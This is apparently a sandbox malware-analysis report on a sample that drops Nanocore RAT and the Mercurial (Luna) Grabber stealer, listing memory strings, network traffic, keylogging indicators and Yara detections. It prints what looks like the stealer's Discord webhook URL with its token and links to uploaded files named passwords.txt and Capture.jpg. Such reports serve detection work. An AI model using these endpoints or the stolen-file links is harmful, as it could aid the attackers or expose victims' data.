Source: output.exe, 00000005.00000002.303048035.00000000026E6000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302561397.00000000025EB000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302895001.000000000268F000.00000004.00000001.sdmp, ConDrv.5.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/923954670580420641/931537246346162207/Capture.jpg
Source: 4Y85lSOUJ0.exe, output.exe.0.dr	String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: output.exe, 00000005.00000002.302801569.000000000262A000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com
Source: 4Y85lSOUJ0.exe, output.exe.0.dr	String found in binary or memory: https://discord.com/api/webhooks/927987281703350292/hNa4BC1580ABvkRj9aSBy9rORGnNfCEHIauFtOCPo1WWv1cp
Source: output.exe, 00000005.00000002.302937012.000000000269F000.00000004.00000001.sdmp, output.exe, 00000005.00000002.303048035.00000000026E6000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302970081.00000000026BB000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com8
Source: output.exe, 00000005.00000002.302801569.000000000262A000.00000004.00000001.sdmp	String found in binary or memory: https://discord.comx
Source: 4Y85lSOUJ0.exe, output.exe.0.dr	String found in binary or memory: https://discordapp.com/api/v8/users/
Source: output.exe.0.dr	String found in binary or memory: https://i.imgur.com/vgxBhmx.png
Source: output.exe, 00000005.00000002.302970081.00000000026BB000.00000004.00000001.sdmp	String found in binary or memory: https://i.imgur.com/vgxBhmx.pngultipart/form-data
Source: 4Y85lSOUJ0.exe, output.exe.0.dr	String found in binary or memory: https://ip4.seeip.org
Source: output.exe, 00000005.00000002.302497941.00000000025CA000.00000004.00000001.sdmp	String found in binary or memory: https://ip4.seeip.org/
Source: output.exe, 00000005.00000002.302497941.00000000025CA000.00000004.00000001.sdmp	String found in binary or memory: https://ip4.seeip.orgx
Source: output.exe, 00000005.00000002.302970081.00000000026BB000.00000004.00000001.sdmp, ConDrv.5.dr	String found in binary or memory: https://media.discordapp.net/attachments/923954670580420641/931537240771944498/passwords.txt
Source: output.exe, 00000005.00000002.303048035.00000000026E6000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302561397.00000000025EB000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302895001.000000000268F000.00000004.00000001.sdmp, ConDrv.5.dr	String found in binary or memory: https://media.discordapp.net/attachments/923954670580420641/931537246346162207/Capture.jpg
Source: output.exe, 00000005.00000002.302937012.000000000269F000.00000004.00000001.sdmp, output.exe, 00000005.00000002.303048035.00000000026E6000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302650273.0000000002610000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302902345.0000000002693000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302970081.00000000026BB000.00000004.00000001.sdmp, output.exe, 00000005.00000002.302925247.000000000269B000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 4Y85lSOUJ0.exe, output.exe.0.dr	String found in binary or memory: https://www.countryflags.io/
Source: output.exe, 00000005.00000002.302801569.000000000262A000.00000004.00000001.sdmp	String found in binary or memory: https://www.countryflags.io/CH/flat/48.png

Source: unknown

DNS traffic detected: queries for: ip4.seeip.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ip4.seeip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //json/84.17.52.18 HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)

Source: nano.exe, 00000002.00000002.551067632.000000000122A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Installs a raw input device (often for capturing keystrokes)

Source: nano.exe, 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected MercurialGrabber

Source: Yara match	File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de43ac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.2de9114.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.output.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287619799.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.301105822.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285297877.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285865715.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.285573349.0000000000302000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: output.exe PID: 7124, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\output.exe, type: DROPPED

Yara detected Nanocore RAT

Source: Yara match	File source: 4Y85lSOUJ0.exe, type: SAMPLE
Source: Yara match	File source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\nano.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED

System Summary:

Malicious sample detected (through community Yara rule)

Source: 4Y85lSOUJ0.exe, type: SAMPLE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4Y85lSOUJ0.exe, type: SAMPLE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4Y85lSOUJ0.exe, type: SAMPLE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.5720000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.2de9114.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.2de43ac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 5.2.output.exe.300000.0.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.32b1744.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.0.output.exe.300000.2.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.nano.exe.42e9846.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.nano.exe.5c44629.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.2.nano.exe.42ee67c.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.nano.exe.a80000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 5.0.output.exe.300000.1.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.0.output.exe.300000.0.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.nano.exe.a80000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.4Y85lSOUJ0.exe.69226b.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000000.280292541.0000000000692000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.554989173.0000000005720000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\ProgramData\output.exe, type: DROPPED	Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: C:\ProgramData\nano.exe, type: DROPPED	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: C:\ProgramData\nano.exe, type: DROPPED	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Uses 32bit PE files

Source: 4Y85lSOUJ0.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Yara signature match

Source: 4Y85lSOUJ0.exe, type: SAMPLE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4Y85lSOUJ0.exe, type: SAMPLE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4Y85lSOUJ0.exe, type: SAMPLE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4Y85lSOUJ0.exe, type: SAMPLE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.5720000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.5720000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.2de9114.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
